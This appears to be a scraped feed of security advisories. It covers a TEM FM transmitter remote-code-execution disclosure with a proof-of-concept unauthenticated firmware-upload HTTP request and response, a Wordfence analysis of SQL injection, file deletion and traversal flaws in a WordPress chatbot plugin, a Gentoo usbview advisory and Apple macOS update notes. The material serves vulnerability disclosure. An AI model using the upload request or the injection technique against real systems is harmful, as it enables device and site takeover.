Bei einem erfolgreichen Angriff ist der Angreifer in der Lage, den Zugang zu den Ressourcen der betroffenen Komponente und weiterführend aus Komponenten des Betriebssystems vollständig zu verweigern. Zum Beispiel durch das Löschen von Dateien.

email: contact@rehmeinfosec.de | threema: WTZ4BZN9

CVE-2023-45869: CVE-2023-45869 - Labor - rehme.infosec

TEM Opera Plus FM Family Transmitter version 35.45 suffers from a remote code execution vulnerability.

    TEM Opera Plus FM Family Transmitter 35.45 Remote Code ExecutionVendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.Product web page: https://www.tem-italy.itAffected version: Software version: 35.45                  Webserver version: 1.7Summary: This new line of Opera plus FM Transmitters combines veryhigh efficiency, high reliability and low energy consumption in compactsolutions. They have innovative functions and features that can eliminatethe costs required by additional equipment: automatic exchange of audiosources, built-in stereo encoder, integrated RDS encoder, parallel I/Ocard, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTPWebserver.Desc: The device allows access to an unprotected endpoint that allowsMPFS File System binary image upload without authentication. The MPFS2file system module provides a light-weight read-only file system thatcan be stored in external EEPROM, external serial Flash, or internalFlash program memory. This file system serves as the basis for theHTTP2 web server module, but is also used by the SNMP module and isavailable to other applications that require basic read-only storagecapabilities. This can be exploited to overwrite the flash programmemory that holds the web server's main interfaces and execute arbitrarycode.Tested on: WebserverVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5799Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5799.php18.08.2023--POST /mpfsupload HTTP/1.1Host: 192.168.1.2:8000Content-Length: 251Cache-Control: max-age=0Content-Type: multipart/form-data; boundary=----joxypoxy2User-Agent: MPFS2_PoC/2.0cAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close------joxypoxy2Content-Disposition: form-data; name="i"; filename="MPFSimg2.bin"Content-Type: application/octet-streamMPFS...<CGI BINARY PHONE HOME>-----joxypoxy2--HTTP/1.1 200 OKConnection: closeContent-Type: text/html<html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>

TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution

WordPress AI ChatBot plugin versions 4.8.9 and below suffer from arbitrary file deletion, remote SQL injection, and directory traversal vulnerabilities.

Vulnerability Details and Technical Analysis

The AI ChatBot plugin provides website owners with a plug and play chat solution that can be expanded upon with customizable FAQs and custom text responses. It provides website users with an interface that allows them to look up order information, leave contact information for later callbacks and can be integrated with OpenAI’s ChatGPT or Google’s DialogFlow.

A lot of the interactions with the chatbot happen via AJAX actions. Many of these actions were made available to unauthenticated users in order to allow them to interact with the chatbot. Other actions required at least subscriber-level access.

Unauthenticated SQL Injection – CVE-2023-5204

Description: Unauthenticated SQL Injection via qc_wpbo_search_response 

Affected Plugin:AI ChatBot

Plugin slug:chatbot

Vendor: QuantumCloud

Affected versions: <= 4.8.9

CVE ID: CVE-2023-5204

CVSS score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Researcher: Marco Wotschka 

Fully Patched Version: 4.9.1

One of the many vulnerabilities we discovered was an unauthenticated SQL Injection. The following two AJAX actions are used for searches during interactions with the chatbot:

add_action( 'wp_ajax_nopriv_wpbo_search_response', 'qc_wpbo_search_response' );

add_action( 'wp_ajax_wpbo_search_response', 'qc_wpbo_search_response' );

The wp_ajax_nopriv_wpbo_search_response AJAX action can be used by users who are not authenticated to WordPress due to the hook utilizing ‘nopriv’. On the other hand, the standard wp_ajax_wpbo_search_response AJAX action can only be used by authenticated users due to the inherent functionality of AJAX actions.

qc_wpbo_search_response 

function qc_wpbo_search_response (shortened for brevity)

The qc_wpbo_search_response function hooked by the aforementioned AJAX actions is used to search within the database for responses containing certain keywords. If the $_POST[‘strid’] parameter is set, a record is retrieved from the wpbot_response table by ID. The $strid variable supplied by the POST parameter can be leveraged for SQL Injection, despite being sanitized using the sanitize_text_field function.

According to the WordPress Developer Resources, the sanitize_text_field function checks for invalid UTF-8; converts single < characters to entities; strips all tags; removes line breaks, tabs, and extra whitespace; strips percent-encoded characters. This does not provide sufficient protection against SQL Injection attempts, and is only intended for Cross-Site Scripting protection. Furthermore, the get_results function used in the above function call does not perform any preparation, nor is there any escaping of the user supplied input passed to the SQL Query. We always recommend the use of the prepare function on SQL queries as it provides adequate escaping on the user-supplied values, which prevents SQL injection from being successful. In addition, ensuring that the $strid is an integer would help prevent a SQL Injection attack from being successful.

The lack of a UNION operation in the above SQL query makes exploiting this vulnerability more difficult, but a time-based blind injection approach using the SLEEP() function and CASE statements can still be used to extract information from the database by observing the duration of individual queries. While tedious, this technique can be used to extract sensitive information from the database. This includes hashed passwords.

Arbitrary File Deletion – CVE-2023-5212

Description:Authenticated (Subscriber+) Arbitrary File Deletion via qcld_openai_delete_training_file 

Affected Plugin: AI ChatBot

Plugin slug: chatbot

Vendor: QuantumCloud

Affected versions: <= 4.8.9

CVE ID:CVE-2023-5212

CVSS score: 9.6 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Researcher: Marco Wotschka 

Fully Patched Version: 4.9.1

The plugin offers the ability to upload training files to OpenAI. An arbitrary file deletion vulnerability existed in the  qcld_openai_delete_training_file  function invoked via the following AJAX action:

add_action('wp_ajax_qcld_openai_delete_training_file',[$this,'qcld_openai_delete_training_file']);

delete_training_file 

function qcld_openai_delete_training_file

This vulnerable function accepts a file path via the $_POST[‘file’] parameter and checks whether the file exists. If it does, the function adjusts permissions on the file in such a way that it can be removed and proceeds to delete it. This function misses a capability check to ensure that the user performing the action has proper privileges, as well as a nonce check to ensure that the action is performed intentionally. and is thus vulnerable to Missing Authorization and Cross-Site Request Forgery.

Furthermore, no check is performed ensuring that the file is an OpenAI training file and that it resides in a location or directory where training files are expected to be located. This could allow an authenticated attacker with subscriber-level privileges or higher to remove the wp-config.php file of an affected site, which would invoke the WordPress installation script on the next site visit and could lead to a complete site takeover.

The file path passed via the $_POST[‘file’] parameter could also point to a file outside of the affected website, thus enabling the deletion of wp-config.php files of other sites in shared hosting environments. Deleting wp-config.php forces the site into a setup state, at which point an attacker can take over the site by pointing it to a database under their control. Of course, attackers are not limited to deleting PHP files either as long as the web server can change file permissions and delete the file.

Version 4.9.1 removed this function as well as the corresponding AJAX action. Version 4.9.2 reintroduced the vulnerable function and action hook, which were both again removed in version 4.9.3.

Directory Traversal to Arbitrary File Write – CVE-2023-5241

Description: Authenticated (Subscriber+) Directory Traversal to Arbitrary File Write via qcld_openai_upload_pagetraining_file 

Affected Plugin: AI ChatBot

Plugin slug: chatbot

Vendor:QuantumCloud

Affected versions: <= 4.8.9

CVE ID: CVE-2023-5241

CVSS score: 9.6 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H

Researcher: Marco Wotschka 

Fully Patched Version: 4.9.1

We also discovered an arbitrary file write vulnerability which exists in the qcld_openai_upload_pagetraining_file function. The entire function is rather long which is why we won’t display it here in its entirety.

upload_training_file 

function qcld_openai_upload_pagetraining_file (shortened for brevity)

The function expects a filename to be passed as a  $_POST[‘filename’]  parameter, which is sanitized using the sanitize_text_field function. The $file variable is used to determine the location of a file in the wp-content/uploads/qcldopenai_site_training/ directory. If the file exists, the function proceeds to declare a variable called $split_file, creates a file handle $qcld_openai_json_file and opens the file in append mode. This means that the file is not overwritten but anything written to the file is instead appended.

It is not immediately clear what the purpose of this part of the function is since it simply appends the contents that are already in the file to the end of the file until the length of the content that is added exceeds $this->wpaicg_max_file_size or the entire file has been duplicated.

The corresponding if-statement that determines when to terminate writing to the file looks as follows:

if(mb_strlen($qcld_openai_content, '8bit') >$this->wpaicg_max_file_size)

In a default installation $this->wpaicg_max_file_size is not defined and therefore NULL. Hence, in such scenarios the function adds the first line of the file specified by the user to the end of the file. Since NULL is interpreted as zero in a comparison statement like this, any positive file size will suffice to break out of this part of the function.

Unfortunately, this code is vulnerable to Directory Traversal via the filename parameter. If the filename that is passed is a relative path to wp-config.php, the file handle will ultimately point to the site’s wp-config.php file. An authenticated attacker with subscriber-privileges or higher could utilize this fact to append the first line of its content to the file wp-config.php, which would be <?php.

While an attacker does not have any influence on the data that is written, in most cases a <?php could be written to the end of a targeted PHP file, which can lead to catastrophic consequences as the added PHP tag may result in an error such as

Parse error: syntax error, unexpected token "<", expecting end of file

This prevents the site from loading properly and can be used to append to any PHP file (or other files) including those in shared hosting environments leading to Denial of Service (DoS). One way to prevent Directory Traversal is to use the sanitize_file_name function, which removes special characters including slashes and leading dots from the file name.

Version 4.9.1 removed this function as well as the corresponding AJAX action. Version 4.9.2 reintroduced the vulnerable function and action hook, which were both again removed in version 4.9.3.

Numerous Other Missing Authorization and Cross-Site Request Forgery Vulnerabilities

In addition to the vulnerabilities outlined above, we discovered several AJAX actions without proper capability checks, which made it possible for authenticated attackers with minimal access, such as subscribers, to invoke those actions. Several of the functions were also missing nonce verification, which would make it possible for attackers to forge requests on behalf of a site administrator, or any other authenticated user considering capability checks were also missing.

However, these vulnerabilities had minimal impact and led to the exposure of information such as user order details and user names, the download and extraction of a zip used by the plugin (not arbitrary zip files), cache deletion, as well as starting and stopping of search indexing jobs to name a few. The severity of those actions is lower than the ones we detailed above.

Timeline

September 25-28, 2023 – The Wordfence Threat Intelligence team discovers several vulnerabilities in the AI ChatBot plugin.

September 28, 2023 – We initiate contact with the plugin developer.

September 29, 2023 – We release a firewall rule to protect Wordfence Premium , Wordfence Care , and Wordfence Response  customers and send the full disclosure to the plugin developer. Receipt of the disclosure is acknowledged.

October 10, 2023 – A fixed version (4.9.1) of the plugin that patches all reported vulnerabilities is released.

October 18, 2023 – Several of the vulnerabilities are reintroduced in version 4.9.2. We inform the vendor about this.

October 19, 2023 – Version 4.9.3 patches the vulnerabilities again.

October 29, 2023 – The firewall rule becomes available to free Wordfence users

Conclusion

In this blog post we covered an Unauthenticated SQL Injection vulnerability (affecting versions <= 4.8.9), as well as an Arbitrary File Write vulnerability and an Arbitrary File Deletion vulnerability (affecting versions <= 4.8.9 and 4.9.2). The SQL Injection vulnerability allows unauthenticated attackers to extract sensitive information from the database using a time-based blind injection approach, which could ultimately lead to exposure of admin credentials and site takeover.

The Arbitrary File Write vulnerability can be utilized by authenticated attackers to append opening PHP tags (in default configurations) to any file including the wp-config.php file, which can lead to Denial of Service (DoS). The Arbitrary File Deletion vulnerability can be used by authenticated attackers to delete any file on the web server offering the possibility of complete site takeovers.

All Wordfence running Wordfence Premium , Wordfence Care , and Wordfence Response , have been protected against these vulnerabilities as of September 29, 2023. Users still using the free version of Wordfence will receive the same protection on October 29, 2023.

If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as these vulnerabilities pose a significant risk.

For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence  and potentially earn a spot on our leaderboard .

WordPress AI ChatBot 4.8.9 SQL Injection / Traversal / File Deletion

Gentoo Linux Security Advisory 202310-15 - A vulnerability has been discovered in usbview where certain users can trigger a privilege escalation. Versions greater than or equal to 2.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: USBView: root privilege escalation via insecure polkit settings  
     Date: October 26, 2023  
     Bugs: #831756  
       ID: 202310-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been discovered in usbview where certain users can  
trigger a privilege escalation.

Background  
=========  
USBView is a tool to display the topology of devices on the USB bus.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
app-admin/usbview  < 2.2         >= 2.2

Description  
==========  
A vulnerability has been discovered in usbview. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
USBView allows some local users (e.g., ones logged in via SSH) to  
execute arbitrary code as root because certain Polkit settings (e.g.,  
allow_any=yes) for pkexec disable the authentication requirement. Code  
execution can, for example, use the --gtk-module option.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All USBView users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-admin/usbview-2.2"

References  
=========  
[ 1 ] CVE-2022-23220  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23220

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-15

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-15

Apple Security Advisory 10-25-2023-5 - macOS Ventura 13.6.1 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-25-2023-5 macOS Ventura 13.6.1

macOS Ventura 13.6.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213985.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

CoreAnimation  
Available for: macOS Ventura  
Impact: An app may be able to cause a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40449: Tomi Tokics (@tomitokics) of iTomsn0w

FileProvider  
Available for: macOS Ventura  
Impact: An app may be able to cause a denial-of-service to Endpoint  
Security clients  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-42854: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Find My  
Available for: macOS Ventura  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40413: Adam M.

Foundation  
Available for: macOS Ventura  
Impact: A website may be able to access sensitive user data when  
resolving symlinks  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2023-42844: Ron Masas of BreakPoint.SH

Image Capture  
Available for: macOS Ventura  
Impact: An app may be able to access protected user data  
Description: The issue was addressed with improved checks.  
CVE-2023-41077: Mickey Jin (@patch1t)

ImageIO  
Available for: macOS Ventura  
Impact: Processing an image may result in disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40416: JZ

IOTextEncryptionFamily  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40423: an anonymous researcher

iperf3  
Available for: macOS Ventura  
Impact: A remote user may be able to cause unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved checks.  
CVE-2023-38403

Kernel  
Available for: macOS Ventura  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory mitigations  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42849: Linus Henze of Pinauten GmbH (pinauten.de <http://pinauten.de/>)

Model I/O  
Available for: macOS Ventura  
Impact: Processing a file may lead to unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42856: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Passkeys  
Available for: macOS Ventura  
Impact: An attacker may be able to access passkeys without  
authentication  
Description: The issue was addressed with additional permissions checks.  
CVE-2023-40401: an anonymous researcher, weize she

Pro Res  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42841: Mingxuan Yang (@PPPF00L), happybabywu and Guang Gong of  
360 Vulnerability Research Institute

talagent  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40421: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Weather  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41254: Cristian Dinca of "Tudor Vianu" National High School of  
Computer Science, Romania

WindowServer  
Available for: macOS Ventura  
Impact: A website may be able to access the microphone without the  
microphone use indicator being shown  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-41975: an anonymous researcher

Additional recognition

GPU Drivers  
We would like to acknowledge an anonymous researcher for their  
assistance.

libarchive  
We would like to acknowledge Bahaa Naamneh for their assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, Ned Williamson of Google Project  
Zero for their assistance.

macOS Ventura 13.6.1 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmU5Y38ACgkQX+5d1TXa  
Ivp+exAAw1mhJG3ak3Vbixgq7vCy2CVcwwT1ISygYRdE0vJ2BPJVVMiNtflLuqoG  
wLazegOLQkj8VFYt4tWHC+mceX7NWq6zDeoR/lvure5DkbeFRoiyzqJimqpzLhBL  
nqzTUPvu4xrsC3u0DTTsJscEbZPx8h2WxXo/Cd1pIS2ajSDS5qklQIj+foOgPgXF  
AawOcERzVIgScIPCS3M8sIbZz63FV2CjX2OE+flr5fPSFDq0vtrOwa46pGw3hLjW  
BKhTJjhaUDneN/qsTuj+5AmqwDrCBUPltOxLDI/vjRUX+LGPmJdsPmnVL0HShNk+  
y87mbJtrXrHv6IrvcjdHfbglJVX+jjBsoGoUadM2qLNCoVK7vrfSvoFsba09Z3U+  
YK/1DCPVGq253vDfdWfoNsMUorCOP6CwmGZARMM+FErD3rUqxm3XBpZ3Jv4sLBvv  
fYyMLsn7YCBj31VzFafbliKGfduu7iijTdnfgTXEuNviTcOozeag8uNc0IW5tJKG  
bOEq6teHBXSiVQ5V84/K0hndN/DGiTXrQPJw0rjZ3V7N0olCyMdvXFGUhoDYVY5L  
WgKEpYgIJn44644Jzuj4gXEbc+sDlm+027OS2u5KrxNCtEIO2iLKTfc8dd2yJeq2  
CmMdV3N0L4smeLelGxZAtcwJc4Rdjh0Skair1iossxep+PGWAAo=kCLD  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-25-2023-5

Apple Security Advisory 10-25-2023-4 - macOS Sonoma 14.1 addresses bypass, code execution, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-25-2023-4 macOS Sonoma 14.1

macOS Sonoma 14.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213984.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

App Support  
Available for: macOS Sonoma  
Impact: Parsing a file may lead to an unexpected app termination or  
arbitrary code execution  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-30774

AppSandbox  
Available for: macOS Sonoma  
Impact: An app may be able to access user-sensitive data  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40444: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Contacts  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41072: Wojciech Regula of SecuRing (wojciechregula.blog) and  
Csaba Fitzl (@theevilbit) of Offensive Security  
CVE-2023-42857: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

CoreAnimation  
Available for: macOS Sonoma  
Impact: An app may be able to cause a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40449: Tomi Tokics (@tomitokics) of iTomsn0w

Emoji  
Available for: macOS Sonoma  
Impact: An attacker may be able to execute arbitrary code as root from  
the Lock Screen  
Description: The issue was addressed by restricting options offered on a  
locked device.  
CVE-2023-41989: Jewel Lambert

FileProvider  
Available for: macOS Sonoma  
Impact: An app may be able to cause a denial-of-service to Endpoint  
Security clients  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-42854: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Find My  
Available for: macOS Sonoma  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40413: Adam M.

Foundation  
Available for: macOS Sonoma  
Impact: A website may be able to access sensitive user data when  
resolving symlinks  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2023-42844: Ron Masas of BreakPoint.SH

ImageIO  
Available for: macOS Sonoma  
Impact: Processing an image may result in disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40416: JZ

IOTextEncryptionFamily  
Available for: macOS Sonoma  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40423: an anonymous researcher

iperf3  
Available for: macOS Sonoma  
Impact: A remote user may be able to cause unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved checks.  
CVE-2023-38403

Kernel  
Available for: macOS Sonoma  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory mitigations  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42849: Linus Henze of Pinauten GmbH (pinauten.de)

LaunchServices  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: The issue was addressed with improved permissions logic.  
CVE-2023-42850: Thijs Alkemade (@xnyhps) from Computest Sector 7, Brian  
McNulty, Zhongquan Li

Login Window  
Available for: macOS Sonoma  
Impact: An attacker with knowledge of a standard user's credentials can  
unlock another standard user's locked screen on the same Mac  
Description: A logic issue was addressed with improved state management.  
CVE-2023-42861: Jon Crain, 凯 王, Brandon Chesser & CPU IT, inc, Matthew  
McLean, Steven Maser, and Avalon IT Team of Concentrix

Mail Drafts  
Available for: macOS Sonoma  
Impact: Hide My Email may be deactivated unexpectedly  
Description: An inconsistent user interface issue was addressed with  
improved state management.  
CVE-2023-40408: Grzegorz Riegel

Maps  
Available for: macOS Sonoma  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-40405: Csaba Fitzl (@theevilbit) of Offensive Security

Model I/O  
Available for: macOS Sonoma  
Impact: Processing a file may lead to unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42856: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Networking  
Available for: macOS Sonoma  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-40404: Certik Skyfall Team

Passkeys  
Available for: macOS Sonoma  
Impact: An attacker may be able to access passkeys without  
authentication  
Description: A logic issue was addressed with improved checks.  
CVE-2023-42847: an anonymous researcher

Photos  
Available for: macOS Sonoma  
Impact: Photos in the Hidden Photos Album may be viewed without  
authentication  
Description: An authentication issue was addressed with improved state  
management.  
CVE-2023-42845: Bistrit Dahla

Pro Res  
Available for: macOS Sonoma  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-42841: Mingxuan Yang (@PPPF00L), happybabywu and Guang Gong of  
360 Vulnerability Research Institute

Safari  
Available for: macOS Sonoma  
Impact: Visiting a malicious website may reveal browsing history  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-41977: Alex Renda

Safari  
Available for: macOS Sonoma  
Impact: Visiting a malicious website may lead to user interface spoofing  
Description: An inconsistent user interface issue was addressed with  
improved state management.  
CVE-2023-42438: Rafay Baloch & Muhammad Samaak, an anonymous researcher

Siri  
Available for: macOS Sonoma  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: This issue was addressed by restricting options offered on  
a locked device.  
CVE-2023-41982: Bistrit Dahla  
CVE-2023-41997: Bistrit Dahla  
CVE-2023-41988: Bistrit Dahla

talagent  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40421: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Terminal  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: The issue was addressed with improved checks.  
CVE-2023-42842: an anonymous researcher

Vim  
Available for: macOS Sonoma  
Impact: Processing malicious input may lead to code execution  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-4733  
CVE-2023-4734  
CVE-2023-4735  
CVE-2023-4736  
CVE-2023-4738  
CVE-2023-4750  
CVE-2023-4751  
CVE-2023-4752  
CVE-2023-4781

Weather  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41254: Cristian Dinca of "Tudor Vianu" National High School of  
Computer Science, Romania

WebKit  
Available for: macOS Sonoma  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259836  
CVE-2023-40447: 이준성(Junsung Lee) of Cross Republic

WebKit  
Available for: macOS Sonoma  
Impact: Processing web content may lead to arbitrary code execution  
Description: A use-after-free issue was addressed with improved memory  
management.  
WebKit Bugzilla: 259890  
CVE-2023-41976: 이준성(Junsung Lee)

WebKit  
Available for: macOS Sonoma  
Impact: Processing web content may lead to arbitrary code execution  
Description: A logic issue was addressed with improved checks.  
WebKit Bugzilla: 260173  
CVE-2023-42852: an anonymous researcher

WebKit Process Model  
Available for: macOS Sonoma  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 260757  
CVE-2023-41983: 이준성(Junsung Lee)

WindowServer  
Available for: macOS Sonoma  
Impact: A website may be able to access the microphone without the  
microphone use indicator being shown  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-41975: an anonymous researcher

Additional recognition

libarchive  
We would like to acknowledge Bahaa Naamneh for their assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, Ned Williamson of Google Project  
Zero for their assistance.

Login Window  
We would like to acknowledge an anonymous researcher for their  
assistance.

man  
We would like to acknowledge Kirin (@Pwnrin) for their assistance.

Power Manager  
We would like to acknowledge Xia0o0o0o (@Nyaaaaa_ovo) of University of  
California, San Diego for their assistance.

Reminders  
We would like to acknowledge Noah Roskin-Frazee and Prof. J.  
(ZeroClicks.ai Lab) for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Sonoma 14.1 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmU5Y1gACgkQX+5d1TXa  
Ivp59RAA2EQwY61OvHZQ0u99Wov8TAoM9popyjLrkWBvKbTH03vdZIXyeCOaqFR8  
aT5SAlRwGOv0QIp/KmRweGlLl96/YP5fhgmDxISwahJZqOuwFkcj9OTfmoENyd6w  
7YYr0BwSfFhrFEQm/OdE4TbiXp+87YiPXA0NPVeClw15bpmQ830aIY3iMJrCLcAE  
ZI6QW9Yi3ynYhor1U+24V8hCM6LgMClNCWavZMorx3D1dfcPkhfspZL1cLqrGNqz  
cCF0IJaJDqKiFG//4FQqDbMOUuP3/FMkH4vED+9krIRqe51P6XDkVeI/BgFo6wpu  
hgZVgcPxMgbeiZX7O4BAY/ygLe2pKpyvBDJKCCo4GjkypcjmFhyyul+J45yLOSA1  
+x9EzYE8OSOn4dGA+qT9aKC4Csti9idoK0KsYHN7jCLU56Y9gvIV2n+PcWVhI4RF  
gE4BD+71vPyn6+tpf27+Kt5qW1Mj3ru6Q3u0w2xobbLdpgxc66EfCn2ZLxuzSqvc  
kSgwf1yOpiMLzBMAqWxgX51qppsQA1du8G6ZNmPjdyV28GpaWNzL/qb3vivaSYkK  
b6vrLEGID7U4wFjbVfuc7v0xmZeOgUprH6eQ7PnjRdmMq0xDaW8xFs3iGc6GScvl  
ZCI4CcZSLGPrCzmyUpbD+OMFT4SDDaOGSNEXW7jOrRjgQMc6bJQ=  
=YgRC  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-25-2023-4

Apple Security Advisory 10-25-2023-1 - iOS 17.1 and iPadOS 17.1 addresses bypass, code execution, and use-after-free vulnerabilities.

